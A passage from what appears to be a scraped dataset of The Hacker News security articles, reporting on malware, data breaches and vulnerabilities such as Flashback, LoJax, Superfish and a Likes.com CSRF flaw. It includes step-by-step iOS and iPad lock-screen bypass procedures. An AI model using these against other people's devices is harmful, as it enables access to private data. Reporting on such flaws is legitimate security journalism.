Paypal users browse the malformed shopping website, and click on ""CheckOut"" button to Pay with their Paypal account, they'll be redirected to the Secure Payments page The page actually displays a phishing page where the victims are asked to enter their payment card information to complete the purchasing Now on clicking the Submit Payment Button, instead of paying the product price (let's say $100), the Paypal user will pay the attacker amount of attacker's choice Video Demonstration The researcher has also provided a proof-of-concept (PoC) video that shows attack in work. You can watch the video here. Hegazy reported this serious security vulnerability to the PayPal team on June 19th, and the team confirmed the security hole, which was fixed on August 25 – just over two months later. PayPal has also rewarded Hegazy with a bug bounty of $750 for his findings, which is the company's maximum bug bounty payout for XSS vulnerabilities. ",Vulnerability Mouabad Android Malware calling to Premium numbers; Generating revenue for its Master,https://thehackernews.com/2013/12/mouabad-android-malware-calling-to.html,"Android platform is a primary target for malware attacks from few years and during 2013, more than 79% of mobile operating malware threats are taking place on Android OS. I have been working on Android Malware architectures since last two years and created 100's of sample of most sophisticated malware for demo purpose. Till now we have seen the majority of Android malware apps that earn money for their creators by sending SMS messages to premium rate numbers from infected devices. Security researchers at Lookout identified an interesting monetized Android Malware labeled as 'Mouabad', that allow a remote attacker to make phone calls to premium-rate numbers without user interaction from C&C servers by sending commands to the malware. The technique is not new, but infection from such app notified first time in the wild. The variant dubbed MouaBad.p., is particularly sneaky and to avoid detection it waits to make its calls until a period of time after the screen turns off and the lock screen activates. ""Mouabad.p also end the calls it makes as soon as a user interacts with their device (e.g. unlocks it). However, this malware variant does not appear to have the ability to modify call logs so a discerning victim could uncover Mouabad.p's dialing activity by checking their call histories."" Risk of infection is low, because the malware app works only on devices running Android version 3.1 or old and designed to mainly target Chinese-speaking users. ""Mouabad.p and other trojans that can financially harm users and effectively hide themselves underscore the need for sophisticated mobile malware protection."" Android architecture loophole contributes to the growth of Android malware. It basically can't identify the difference between a legit app i.e. Taking permissions to read your Contacts or SMS (i.e. True Caller), or a malicious applications (i.e. Trojans), or state-sponsored applications (i.e. WeChat). Neither Android architecture allows users to revoke the list of permissions they don't want to give to an application. For now, If you own a Smartphone, I highly recommend you to install applications only from some trusted App Store i.e. Google Play. ",Malware "Mac OS X Flashback Trojan is still alive, recently infected 22,000 Apple machines",https://thehackernews.com/2014/01/mac-os-x-flashback-trojan-is-still.html,"The Flashback Trojan, the most sophisticated piece of malware that infected over 600,000 Apple's Macs systems back in April, 2012 is still alive and has infected about 22,000 machines recently, according to the researchers from Intego. For a refresh, Flashback Trojan was first discovered in September 2011, basically a trojan horse that uses a social engineering to trick users into installing a malicious Flash player package. Once installed, the Flashback malware injects a code into that web browser and other applications like Skype to harvest passwords and other information from those program's users. The Trojan targets a known vulnerability in Java on Mac OS X systems. The system gets infected after the user redirects to a compromised website, where a malicious javascript code to load the exploit with Java applets. Then an executable file is saved on the local machine, which is used to download and run malicious code from a remote location. It took Apple months to recognize the severity of this Mac malware threat, which first appeared in the Fall of 2011. However, Apple released the patch and updated the specific introduction about the operating system, ""It doesn't get PC viruses"" to ""It's built to be safe."" on the Apple website. Intego said: The Apple Product Security Response team took serious actions in 2012 to mitigate the threat using XProtect and other security updates (including a Malware Removal Tool), however, the botnet count was only divided by six according to our sinkhole. Now in 2014, Intego researcher Abbati claims that Flashback botnet is still alive and is silently ""adrift."" Intego purchased some of the command and control (C&C) server domain names to monitor the Flashback threat that infected hundreds of thousands of Macs. Beginning January 2, we studied those domains and our sinkhole servers recorded all connections from Macs where Flashback is still active and trying to contact the C&C servers. Below is a screenshot of the Apache Server log: On April 2012, the Mac world was stunned to learn that the Flashback Trojan had infected millions of machines. The Flashback Ad-clicking the component tool that caused infected Macs to view sponsored links that had the potential to generate millions of dollars in fraudulent ad revenue. In addition, it has the capability to do much more, including sending spam, engaging in denial-of-service attacks, or logging passwords. To protect your computer from contracting the virus now, download Apple's latest software update or use Apple's official 'Flashback malware removal tool'. Other easiest way to detect and remove this malware from your Mac system is to download F-Secure's Flashback removal tool. ",Malware Georgia Tech Data Breach Exposes 1.3 Million Users' Personal Data,https://thehackernews.com/2019/04/georgia-tech-data-breach.html,"The Georgia Institute of Technology, well known as Georgia Tech, has confirmed a data breach that has exposed personal information of 1.3 million current and former faculty members, students, staff and student applicants. In a brief note published Tuesday, Georgia Tech says an unknown outside entity gained ""unauthorized access"" to its web application and accessed the University's central database by exploiting a vulnerability in the web app. Georgia Tech traced the first unauthorized access to its system to December 14, 2018, though it's unclear how long the unknown attacker(s) had access to the university database containing sensitive students and staff information. The database contained names, addresses, social security numbers, internal identification numbers, and date of birth of current and former students, faculty and staff, and student applicants. However, the University has launched a forensic investigation to determine the full extent of the breach. ""The information illegally accessed by an unknown outside entity was located on a central database. Georgia Tech's cybersecurity team is conducting a thorough forensic investigation to determine precisely what information was extracted from the system, which may include names, addresses, social security numbers, and birth dates,"" the note published on the University website reads. The University's IT team discovered the web app vulnerability at the end of last month when it noticed a significant performance impact. ""Application developers for the Institute noticed a significant performance impact in one of its web applications and began an investigation on March 21, 2019,"" Georgia Tech says in the FAQs detailing the incident. ""During this investigation, it was determined the performance issue was the result of a security incident."" Georgia Tech has since patched the vulnerability and already started notifying potentially impacted individuals via email. The University is also ""coordinating with consumer reporting agencies and the University System of Georgia to determine what protections will be provided"" to the affected individuals. Georgia Tech has also notified the U.S. Department of Education and University System of Georgia (USG) and is expected to release more information soon. ""We continue to investigate the extent of the data exposure and will share more information as it becomes available. We apologize for the potential impact on the individuals affected and our larger community. We are reviewing our security practices and protocols and will make every effort to ensure that this does not happen again,"" the University said. ",Data_Breaches Another iPhone lockscreen bypass vulnerability found in iOS 7.02,https://thehackernews.com/2013/09/another-iphone-lockscreen-bypass.html,"Here we go again! Earlier this week, Apple released iOS 7.0.2 just to fix some Lockscreen bugs in iOS 7 and but a researcher has found a new Lockscreen bug in new iOS 7.0.2. This new Lockscreen bug is found by Dany Lisiansky, and he uploaded a proof of concept video on YouTube with the complete step by step guide. Unlike the previous bugs it will not expose your Email, Photos, Facebook and Twitter but allows attackers to access your phone call history, voicemails and entire list of contacts. A step by step guide released by iDownloadblog: Make a phone call (with Siri / Voice Control) Click the FaceTime button When the FaceTime App appears, click the Sleep button Unlock the iPhone Answer and End the FaceTime call at the other end Wait a few seconds Done. You are now in the phone app Video demonstration It would be easy for someone who knows you or your love partner or your business partner to obtain your phone and call themselves from it to take advantage of this trick and they may only gain access to the Phone app. Fixing this bug is pretty simple, Disable the Siri in Lockscreen by navigating to ""Settings –> General –> Passcode –> Siri"" and disable it there. Also read that how an Iranian group defeated the iPhone Fingerprinting scanner Touch ID again, which allows them to unlock an iPhone device with multiple Fingerprints. Post by The Hacker News. ",Vulnerability All Smartwatches are vulnerable to Hackers,https://thehackernews.com/2015/07/smartwatch-hacking.html,"Do you own a Smartwatch? If yes, then how safe it is? There are almost 100 percent chances that you own a vulnerable Smartwatch. Computer manufacturer Hewlett-Packard is warning users of smartwatches including Apple Watch and Samsung Gear that their wearable devices are vulnerable to cyber attacks. In a study, HP's Fortify tested today's top 10 smartwatches for security features, such as basic data encryption, password protection and privacy concerns. The most shocking part of the study was that – Not even a Single Smartwatch Found to be 100 percent Safe Security experts found that 100 percent of wearable devices contained at least one serious security vulnerability that could make the devices vulnerable to hackers. With the increase in the adoption of smartwatches, manufacturers need to pay closer attention to the customers' security because these wearable devices could potentially open doors to new threats to personal and sensitive information. ""As the adoption of Smartwatches accelerates, the platform will become vastly more attractive to those who would abuse that access, making it critical that we take precautions when transmitting personal data or connecting Smartwatches into corporate networks,"" Jason Schmitt, general manager at HP's Security Fortify said in a statement. The study [PDF], no doubt, had included Smart watches by Apple, Pebble, Samsung and Sony, as it claims to have picked top 10 smartwatches. Here's the list of issues reported by HP: 1. Lack of transport encryption – Though all products implemented transport encryption using SSL/TLS, 40 percent of devices found to be either vulnerable to the POODLE attack, allowing the use of weak cyphers, or still using SSL v2. 2. Insecure Interfaces – Three out of ten smartwatches used cloud-based web interfaces and all of them were vulnerable to account harvesting. This allowed unlimited login attempts, helping hackers guess passwords. 3. Insufficient User Authentication/Authorization – Three out of ten smartwatches completely failed to offer Two-Factor authentication, or the ability to lock accounts after 3 to 5 failed password attempts. 4. Insecure Software/Firmware – 7 out of 10 smartwatches had issues with firmware updates. The wearable devices, including smartwatches, often did not receive encrypted firmware updates, but many updates were signed to help prevent malicious firmware updates from being installed. While a lack of encryption did not allow the files to be downloaded and analyzed. 5. Privacy Concerns – Smartwatches also demonstrate a risk to personal security as well as privacy. All the tested devices collected some form of personal information, including username, address, date of birth, gender, heart rate, weight and other health information. The experts said it would not disclose the names of smartphone manufacturers whose watches they had tested, but they are working with vendors to ""build security into their products before they put them out to market."" Meanwhile, HP urges users to not connect their smartwatches to the sensitive access control functions like cars or homes unless strong authorization is offered. ",Cyber_Attack New OSX/Imuler Variant Targeting Tibetan Activists,https://thehackernews.com/2012/11/new-osximuler-variant-targeting-tibetan.html,"Researchers over at Intego have recently discovered a new variant of OSX/Imuler the data-stealing Mac malware, detected as OSX/Imuler.E which is believed to be targeting Tibetan rights activists. ""This backdoor Trojan family was first discovered in September 2011 as a Mac PDF Trojan horse and has been targeting activist organizations with emails containing what appear to be pictures. Each variant has tried different tactics, either trying to scare or entice their target into opening the file."" explained. The cyber criminals behind the campaign are relying on the fact that by default, Mac OS X doesn't display full file extensions, and therefore are attempting to trick end and corporate users into thinking that they're about the view a JPG image file. The Imuler Trojan has two main methods of stealing information, It searches the system for user data OR It can also take screenshots. Then, This data is then uploaded to the controller's server. Last week, Thousands of Tibetans have protested in western China, demanding independence and the return of exiled spiritual leader the Dalai Lama. We always recommend users that good idea to run antivirus software, even on a Mac. ",Malware Firefox Releases Critical Patch Update to Stop Ongoing Zero-Day Attacks,https://thehackernews.com/2019/06/mozilla-firefox-patch-update.html,"Important Update [21 June 2019]—Mozilla on Thursday released another update Firefox version 67.0.4 to patch a second zero-day vulnerability. If you use the Firefox web browser, you need to update it right now. Mozilla earlier today released Firefox 67.0.3 and Firefox ESR 60.7.1 versions to patch a critical zero-day vulnerability in the browsing software that hackers have been found exploiting in the wild. Discovered and reported by Samuel Groß, a cybersecurity researcher at Google Project Zero, the vulnerability could allow attackers to remotely execute arbitrary code on machines running vulnerable Firefox versions and take full control of them. The vulnerability, identified as CVE-2019-11707, affects anyone who uses Firefox on desktop (Windows, macOS, and Linux) — whereas, Firefox for Android, iOS, and Amazon Fire TV are not affected. According to an advisory, the flaw has been labeled as a type confusion vulnerability in Firefox that can result in an exploitable crash due to issues in Array.pop which can occur when manipulating JavaScript objects. At the time of writing, neither the researcher nor Mozilla has yet released any further technical details or proof-of-concept for this flaw. Through Firefox automatically installs latest updates and activate new version after a restart, users are still advised to ensure they are running the latest Firefox 67.0.3 and Firefox (Extended Support Release) 60.7.1 or later. Update The researcher later today shared a few more details about the flaw with The Hacker News, saying the reported flaw primarily leads to Universal Cross-site Scripting (UXSS) attacks, but if combined with a sandbox escape issue, it could also allow attackers to execute arbitrary code remotely on a targeted systems. ""I don't have any insights into the active exploitation part. I found and then reported the bug on April 15. The first public fix then landed about a week ago (sec fixes are held back until close to the next release):"" Groß said on Twitter. ""The bug can be exploited for RCE but would then need a separate sandbox escape. However, most likely it can also be exploited for UXSS which might be enough depending on the attacker's goals."" ",Vulnerability Cybersecurity Researchers Spotted First-Ever UEFI Rootkit in the Wild,https://thehackernews.com/2018/09/uefi-rootkit-malware.html,"Cybersecurity researchers at ESET have unveiled what they claim to be the first-ever UEFI rootkit being used in the wild, allowing hackers to implant persistent malware on the targeted computers that could survive a complete hard-drive wipe. Dubbed LoJax, the UEFI rootkit is part of a malware campaign conducted by the infamous Sednit group, also known as APT28, Fancy Bear, Strontium, and Sofacy, to target several government organizations in the Balkans as well as in Central and Eastern Europe. Operating since at least 2007, Sednit group is a state-sponsored hacking group believed to be a unit of GRU (General Staff Main Intelligence Directorate), a Russian secret military intelligence agency. The hacking group has been associated with a number of high profile attacks, including the DNC hack just before the U.S. 2016 presidential election. UEFI, or Unified Extensible Firmware Interface, a replacement for the traditional BIOS, is a core and critical firmware component of a computer, which links a computer's hardware and operating system at startup and is typically not accessible to users. How Does LoJax UEFI Rootkit Work? According to the ESET researchers, the LoJax malware has the ability to write a malicious UEFI module into the system's SPI flash memory, allowing BIOS firmware to install and execute malware deep inside the computer disk during the boot process. ""This patching tool uses different techniques either to abuse misconfigured platforms or to bypass platform SPI flash memory write protections,"" ESET researchers said in a blog post published today. Since LoJax rootkit resides in the compromised UEFI firmware and re-infects the system before the OS even boots, reinstalling the operating system, formatting the hard disk, or even replacing the hard drive with a new one would not be sufficient to clean the infection. Flashing the compromised firmware with legitimate software is the only way to remove such rootkit malware, which typically is not a simple task for most computer users. First spotted in early 2017, LoJax is a trojaned version of a popular legitimate LoJack laptop anti-theft software from Absolute Software, which installs its agent into the system's BIOS to survive OS re-installation or drive replacement and notifies device owner of its location in case the laptop gets stolen. According to researchers, the hackers slightly modified the LoJack software to gain its ability to overwrite UEFI module and changed the background process that communicates with Absolute Software's server to report to Fancy Bear's C&C servers. Upon analyzing the LoJax sample, researchers found that the threat actors used a component called ""ReWriter_binary"" to rewrite vulnerable UEFI chips, replacing the vendor code with their malicious one. ""All the LoJax small agent samples we could recover are trojanizing the exact same legitimate sample of the Computrace small agent rpcnetp.exe. They all have the same compilation timestamp and only a few tens of bytes are different from the original one,"" ESET researchers said. ""Besides the modifications to the configuration file, the other changes include timer values specifying the intervals between connections to the C&C server."" LoJax is not the first code to hide in the UEFI chip, as the 2015 Hacking Team leak revealed that the infamous spyware manufacturer offered UEFI persistence with one of its products. Also, one of the CIA documents leaked by Wikileaks last year gave a clear insight into the techniques used by the agency to gain 'persistence' on Apple Mac devices, including Macs and iPhones, demonstrating their use of EFI/UEFI and firmware malware. However, according to ESET, the LoJax rootkit installation uncovered by its researchers is the first ever recorded case of a UEFI rootkit active in the wild. How to Protect Your Computer From Rootkits As ESET researchers said, there are no easy ways to automatically remove this threat from a system. Since UEFI rootkit is not properly signed, users can protect themselves against LoJax infection by enabling the Secure Boot mechanism, which makes sure that each and every component loaded by the system firmware is properly signed with a valid certificate. If you are already infected with such malware, the only way to remove the rootkit is to reflash the SPI flash memory with a clean firmware image specific to the motherboard, which is a very delicate process that must be performed manually and carefully. Alternative to reflashing the UEFI/BIOS, you can replace the motherboard of the compromised system outright. ""The LoJax campaign shows that high-value targets are prime candidates for the deployment of rare, even unique threats. Such targets should always be on the lookout for signs of compromise,"" researchers wrote. For more in-depth details about the LoJax root, you can head onto a white paper [PDF], titled the ""LoJax: First UEFI rootkit found in the wild, courtesy of the Sednit group,"" published on Thursday by ESET researchers. ",Malware Lenovo Shipping PCs with Pre-Installed 'Superfish Malware' that Kills HTTPS,https://thehackernews.com/2015/02/lenovo-superfish-malware.html,"One of the most popular computer manufacturers Lenovo is being criticized for selling laptops pre-installed with invasive marketing software, or malware that, experts say, opens up a door for hackers and cyber crooks. The software, dubbed 'Superfish Malware', analyzes users' Internet habits and injects third-party advertising into websites on browsers such as Google Chrome and Internet Explorer based on that activities without the user's permission. Security researchers recently discovered Superfish Malware presents onto new consumer-grade Lenovo computers sold before January of 2015. When taken out of the box for the first time, the adware gets activated and because it comes pre-installed, Lenovo customers might end up using it inadvertently. SUPERFISH CERTIFICATE PASSWORD CRACKED The Superfish Malware raised serious security concerns about the company's move for breaking fundamental web security protocols, carrying out ""Man in the Middle"" (MitM) attacks - impersonating the security certificates of encrypted websites in order to monitor users' behavior even on protected sites. This would trouble Lenovo users because MitM attack can open a door for hackers to potentially compromise the sensitive information of any customer affected by Superfish - like passwords or banking details - because users' data isn't actually being protected. Anyone with the password that unlocks that single password-protected certificate authority would be able to completely bypass the computer's web encryption. According to a post by Errata Security's Robert David Graham, he cracked and published the password which was stored in the Superfish software's active memory and was trivial to extract. So, one could imagine the loss, if the same would be done by any hacker or cyber crook. SUPERFISH MALWARE TEMPORARILY REMOVED After the news fired up over the Internet and multiple users complained of popups and other unwanted behavior, the computer giant removed the Superfish Malware. ""We have temporarily removed Superfish from our consumer systems until such time as Superfish is able to provide a software build that addresses these issues. As for units already in market, we have requested that Superfish auto-update a fix that addresses these issues,"" a Lenovo community administrator, Mark Hopkins, wrote in late January. Hopkins also defended the company from criticism over installing Superfish in the first place — but it didn't address the false HTTPS certificate problem. He also says that Lenovo users can refuse the terms and conditions when setting up their laptop in order to disable the software. ""To be clear, Superfish technology is purely based on contextual/image and not behavioral,"" Hopkins' statement reads. ""It does not profile nor monitor user behavior. It does not record user information. It does not know who the user is."" SELF-SIGNED HTTPS CERTS RAISED MAJOR SECURITY CONCERNS While other users on online forums are reporting that Superfish Malware actually installs its own self-signed certificate authority which effectively allows the company to snoop on secure connections. And if true, Superfish Malware could be far more dangerous than we had thought. ""A blatant man-in-the-middle attack malware breaking privacy laws. I have requested return of the laptop and refund as I find it unbelievable that ... Lenovo would facilitate such applications pre bundled with new laptops,"" the user wrote on the Lenovo forums. Facebook engineering director Mike Shaver also warned about the invasive adware via his personal Twitter account, saying that he found SuperFish certificates posted by different users who had shared the same RSA key. ""Lenovo installs a MITM cert and proxy called SuperFish, on new laptops, so it can inject ads? Someone tell me that's not the world I'm in,"" Shaver tweeted. LENOVO - IT'S JUST TO ENHANCE USERS' EXPERIENCE The company this morning issued a weird statement addressing the controversy on the Lenovo computers. According to the computer giant, the Superfish software was ""to help customers potentially discover interesting products while shopping."" ""The relationship with Superfish is not financially significant,"" the statement reads. ""Our goal was to enhance the experience for users. We recognize that the software did not meet that goal and have acted quickly and decisively."" What was my reaction on the fresh statement issued by the company? Oh! Come on Lenovo, we know the reality. May be you are one of the world's largest PC brands, but after all you are also a Chinese PC brand. HOW TO REMOVE LENOVO SUPERFISH In order to remove Lenovo Superfish Malware from your system, run the Microsoft Management Console (mmc.exe), and do the following: Go to File and Click Add/Remove. Choose Certificates, click Add. Choose Computer Account, click Next Choose Local Computer, click Finish Click OK Look under Trusted Root Certification Authorities -> Certificates Find the one issued to Superfish and delete it. LENOVO'S BAD HISTORY REGARDING BACKDOOR This isn't first time, in past the computer giant was caught installing malware backdoors in its products and was also banned by different countries for same reasons. In the mid of 2013, the spy agencies - the 'five eyes' alliance of the US, Britain, Canada, Australia, and New Zealand - banned Lenovo for allegedly installing backdoor into Lenovo-brand circuit boards, along with other vulnerabilities discovered into the firmware. ",Malware DomainFactory Hacked—Hosting Provider Asks All Users to Change Passwords,https://thehackernews.com/2018/07/web-hosting-server-hack.html,"Besides Timehop, another data breach was discovered last week that affects users of one of the largest web hosting companies in Germany, DomainFactory, owned by GoDaddy. The breach initially happened back in last January this year and just emerged last Tuesday when an unknown attacker himself posted a breach note on the DomainFactory support forum. It turns out that the attacker breached company servers to obtain the data of one of its customers who apparently owes him a seven-figure amount, according to Heise. Later the attacker tried to report DomainFactory about the potential vulnerability using which he broke into its servers, but the hosting provider did not respond, and neither disclosed the breach to its customers. In that situation, the attacker head on to the company's support forum and broke the news with sample data of a few customers as proof, which forced DomainFactory to immediately shut down the forum website and initiate an investigation. Attacker Gains Access to a Large Number of Data DomainFactory finally confirmed the breach last weekend, revealing that following personal data belonging to an unspecified number of its customers has been compromised. Customer name Company name Customer account ID Physical address E-mail addresses Telephone number DomainFactory Phone password Date of birth Bank name and account number (e.g. IBAN or BIC) Schufa score (German credit score) Well, that's a whole lot of information, which can be used by cybercriminals for targeted social engineering attacks against the customers. The forum has since been temporarily down, and DomainFactory said that a data feed of certain customer information, accessed by the attacker, was left open to external third parties after a system transition on January 29, 2018. ""We have notified the data protection authority and commissioned external experts with the investigation. The protection of the data of our customers is paramount, and we regret the inconvenience this incident causes, very much,"" the company said. Change All of Your Passwords DomainFactory is now advising its users to change passwords for all of the following services and applications ""as a precautionary measure,"" and also change passwords for other online services where you use the same password. Customer password Phone password Email passwords FTP / Live disk passwords SSH passwords MySQL database passwords Since the compromised data can be used for identity theft and to create direct debits for customers' bank account, users are also recommended to monitor their bank statements for any unauthorized transaction. So far it is unclear how the attacker got into the Domainfactory servers, but the German publication said the attacker did not give an impression of selling the captured data or leaking it online. ",Data_Breaches "$36,000 USD reward for wanted hacker",https://thehackernews.com/2012/12/36000-usd-reward-for-wanted-hacker.html,"Japan's National Police Agency has offered a monetary reward for a wanted hacker, use programming languages like C# to create a virus called ""iesys.exe"" and Hijack systems of innocent people to post aggressive messages on Internet on behalf of Users. Method called a ""Syberian Post Office"" to post messages to popular Japanese bulletin board. Hacker use cross-site request forgery exploit, that allow hackers to making online postings via innocent users automatically. The messages included warnings of plans for mass killings at an elementary school posted to a city website. It is the first time that Japan's National Police Agency has offered a monetary reward for a wanted hacker and will pay up to 3 million yen (US$36,000). The case is an embarrassing one for the police, in which earlier this year four individuals were wrongly arrested after their PCs were hacked and used to post such messages on public bulletin boards. ""Up until now this type of reward was reserved for cases involving crimes like murder and arson, but the policy has recently been changed to include more types of crimes,"" an agency spokeswoman said. ",Malware iPad 2 iOS 5 Lock Screen Bypass Vulnerability [Video Demonstration],https://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html,"iPad 2 iOS 5 Lock Screen Bypass Vulnerability Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device's lockscreen. Anyone with an iPad Smart Cover can gain access to the previously-open app (or the home screen if no app was open). By holding the power button to bring up the 'Power Off' screen, closing the smart cover, re-opening it, and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they'll be able to see the installed apps, but won't be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app. From a locked iPad 2: 1) Lock a password protected iPad 2 2) Hold down power button until iPad 2 reaches turn off slider 3) Close Smart Cover 4) Open Smart Cover 5) Click cancel on the bottom of the screen This isn't the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered you can use Siri when a device is locked. Even if a passcode is required, Siri doesn't care and allows you to carry out functions such as sending email and text messages. Protection Against the iPad 2 Lock Screen Bypass: For the time being, iPad 2 users are encouraged to disable the ""Smart Cover unlocking"" feature found in Settings > General. ",Vulnerability Hackers Targeting Companies Involved in Covid-19 Vaccine Distribution,https://thehackernews.com/2020/12/hackers-targeting-companies-involved-in.html,"A global spear-phishing campaign has been targeting organizations associated with the distribution of COVID-19 vaccines since September 2020, according to new research. Attributing the operation to a nation-state actor, IBM Security X-Force researchers said the attacks took aim at the vaccine cold chain, companies responsible for storing and delivering the COVID-19 vaccine at safe temperatures. The development has prompted the US Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert, urging Operation Warp Speed (OWS) organizations and companies involved in vaccine storage and transport to review the indicators of compromise (IoCs) and beef up their defenses. It is unclear whether any of the phishing attempts were successful, but the company said it has notified appropriate entities and authorities about this targeted attack. The phishing emails, dating to September, targeted organizations in Italy, Germany, South Korea, the Czech Republic, greater Europe, and Taiwan, including the European Commission's Directorate-General for Taxation and Customs Union, unnamed solar panel manufacturers, a South Korean software development firm, and a German website development company. IBM said the attacks likely targeted organizations linked to the Gavi vaccine alliance with the goal of harvesting user credentials to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution. To lend the emails an air of credibility, the operators behind the operation crafted lures that masqueraded as requests for quotations for participation in a vaccine program. The attackers also impersonated a business executive from Haier Biomedical, a legitimate China-based cold chain provider, in an attempt to convince the recipients to open the inbound emails without questioning the sender's authenticity. ""The emails contain malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file,"" IBM researchers Claire Zaboeva and Melissa Frydrych said. Although the researchers could not establish the identities of the threat actor, the ultimate objective, it appears, is to harvest the usernames and passwords and abuse them to steal intellectual property and move laterally across the victim environments for subsequent espionage campaigns. COVID-19 Vaccine Research Emerges a Lucrative Target COVID-19 vaccine research and development has been a target of sustained cyberattacks since the start of the year. Back in June, IBM disclosed details of a similar phishing campaign targeting a German entity connected with procuring personal protective equipment (PPE) from China-based supply and purchasing chains. The cyberassaults led the US Department of Justice to charge two Chinese nationals for stealing sensitive data, including from companies developing COVID-19 vaccines, testing technology, and treatments, while operating both for private financial gain and on behalf of China's Ministry of State Security. In November, Microsoft said it detected cyberattacks from three nation-state agents in Russia (Fancy Bear aka Strontium) and North Korea (Hidden Cobra and Cerium) directed against pharmaceutical companies located in Canada, France, India, South Korea, and the US that are involved in COVID-19 vaccines in various stages of clinical trials. Then last week, it emerged that suspected North Korean hackers have targeted British drugmaker AstraZeneca by posing as recruiters on networking site LinkedIn and WhatsApp to approach its employees with fake job offers and tricking them into opening what were purported to be job description documents to gain access to their systems and install malware. ",Cyber_Attack U.S. Supreme Court allows the FBI to Hack any Computer in the World,https://thehackernews.com/2016/04/fbi-hacking-power.html,"In Brief The US Supreme Court has approved amendments to Rule 41, which now gives judges the authority to issue search warrants, not only for computers located in their jurisdiction but also outside their jurisdiction. Under the original Rule 41, let's say, a New York judge can only authorize the FBI to hack into a suspect's computer in New York. But the amended rule would now make it easier for the FBI to hack into any computer or network, literally anywhere in the world. The Federal Bureau of Investigation (FBI) can now Hack your computers anywhere, anytime. The FBI appeared to have been granted powers to hack any computer legally across the country, and perhaps anywhere in the world, with just a single search warrant authorized by any United States judge. The U.S. Supreme Court approved yesterday a change in Rule 41 of the Federal Rules of Criminal Procedure that would let U.S. judges issue warrants for remote access to electronic devices outside their jurisdiction. ""These amendments will have significant consequences for Americans' privacy and the scope of the government's powers to conduct remote surveillance and searches of electronic devices,"" Democratic Senator Ron Wyden of Oregon said in a statement Thursday. ""Under the proposed rules, the government would now be able to obtain a single warrant to access and search thousands or millions of computers at once; and the vast majority of the affected computers would belong to the victims, not the perpetrators, of cybercrime."" If Congress doesn't act, the changes to the Rule 41 will take immediate effect in December despite opposition from technology giants and civil liberties groups who believes the changes would expand the FBI's power to conduct mass hacks on computer networks. The tech giants and civil liberties groups like the American Civil Liberties Union (ACLU) say the change also could run afoul of the American Constitution's protections against inappropriate searches and seizures. However, while proposing the rule change in 2014, the U.S. Department of Justice described it as a small modification required to modernize the criminal code for the digital age, saying the changes wouldn't permit searches that aren't already legal. The FBI Now Can Legally Hack TOR Users Previously, under the Rule 41, magistrate judges could not approve search warrants to remotely hack or access computers outside their jurisdiction. But with the rule change, magistrate judges could now issue orders to search or seize computers and electronic devices outside their local authority if the target's location is unknown or if the target is using anonymity software like TOR. More than a Million of Internet users make use of TOR anonymity software to browse the Web just to hide their actual identity for entirely legitimate reasons, in addition to criminals who use TOR to hide their locations. Recently, the court threw out evidence that the FBI brought by hacking the members of the child pornography site PlayPen on the TOR network using its so-called Network Investigative Technique (NIT), explaining the feds violated Rule 41's territorial restrictions. This rule change would prevent something like that from happening, opening doors for the FBI to legally hack any computer in any country. The Congress has time until 1 December 2016 to reject changes or make more changes to Rule 41, after which the amended version of the rule will take effect. ",Malware Popular Photo Sharing Website Likes.com Vulnerable To Multiple Critical Flaws,https://thehackernews.com/2014/09/popular-photo-sharing-website.html,"Likes.com, one of the emerging social networking site and popular image browsing platform, is found vulnerable to several critical vulnerabilities that could allow an attacker to completely delete users' account in just one click. Likes.com is a social networking website that helps you to connect with people you like and make new friends for free. Just like any other social place, users can always follow their favorite tag or people who catch their fancy. It is much easier to use and is designed for those who want to look at pictures different people upload. An independent security researcher Mohamed M. Fouad from Egypt has found a series of critical security vulnerabilities in the Likes website that really pose danger to its users. The vulnerabilities he found not only have capability to add any post, comment to users' account as well as delete users' account, but the vulnerabilities can be escalated to deface entire website by posting malicious URLs and delete all users accounts. CRITICAL VULNERABILITIES IN LIKES.COM Fouad discovered that the Likes.com website is vulnerable to three security vulnerabilities: Login-brute force Login bypass CSRF - Cross-Site Request Forgery CSRF VULNERABILITY Among all the three flaws, the most critical one, according to Fouad, is CSRF vulnerability, because exploiting this vulnerability can allow an attacker to force users to add malicious links to their posts and comments and if user click it, their accounts can be deleted in just a click. Cross-Site Request Forgery (CSRF or XSRF) is a method of attacking a Web site in which an intruder masquerades as a legitimate and trusted user. All the attacker need to do is get the target browser to make a request to your website on their behalf. If they can either: Convince your users to click on a HTML page they've constructed Insert arbitrary HTML in a target website that your users visit Basically, an attacker will use CSRF to trick a victim into accessing a website or clicking a URL link that contains malicious or unauthorized requests. JUST ONE CLICK AND USERS' ACCOUNTS DELETED ""It's so easy, I tried it but in some testing accounts. I was able to generate my malicious url in all posts by image_id (Post) then my malicious url was in thousands of posts as a comment. So any user who click it, his/her account will be deleted immediately,"" Fouad told The Hacker News. Not just this, the CSRF vulnerability could be escalated by a cyber criminal to deface entire website by generating random POSTs (image_ids) and post malicious url to (DELETE USER ACCOUNTS) in order to delete a number of users account just in one click. ""Using same CSRF vulnerability, I can also force the user to post my malicious URL to his/her account, so that all his/her friends who will browse that link, their accounts will be deleted by just one click."" LOGIN BRUTE-FORCE ATTACK Fouad discovered an account password by systematically trying every possible combination of letters, numbers and symbols until and unless he discovered the correct combination. This clearly means that the login page of the Likes.com website doesn't have any protection against password brute force attacks. As a result, anyone can try multiple number of attempts in order to guess the correct password combination. The site must have implemented some type of account lockout after a defined number of incorrect password attempts, said Fouad in his blog post. LOGIN BYPASS ATTACK Fouad also found a security problem with login when anyone click on ""unsubscribe"" link in their email notifications. Once clicked, user is redirected to the account settings. Now, when he tried to open this URL in different browsers and different machines, he was able to access the account normally, and that too without Login. This shows Likes accounts can bypassed your login. As a responsible security researcher, Fouad also reported the critical flaws 10 days ago to the Likes team, but neither the company fix it, nor it replied him back. Fouad has also provided a video demonstration as a Proof of Concept. The security vulnerabilities are critical and should be fixed as soon as possible. ",Vulnerability Stabuniq Trojan rapidly stealing data from US banks,https://thehackernews.com/2012/12/stabuniq-trojan-rapidly-stealing-data.html,"Trojan.Stabuniq geographic distribution by unique IP address Security researchers from Symantec have identified a new Trojan that appears to be targeting financial institutions. Dubbed Trojan.Stabuniq, the malware has been collecting information from infected systems potentially for the preparation of a more 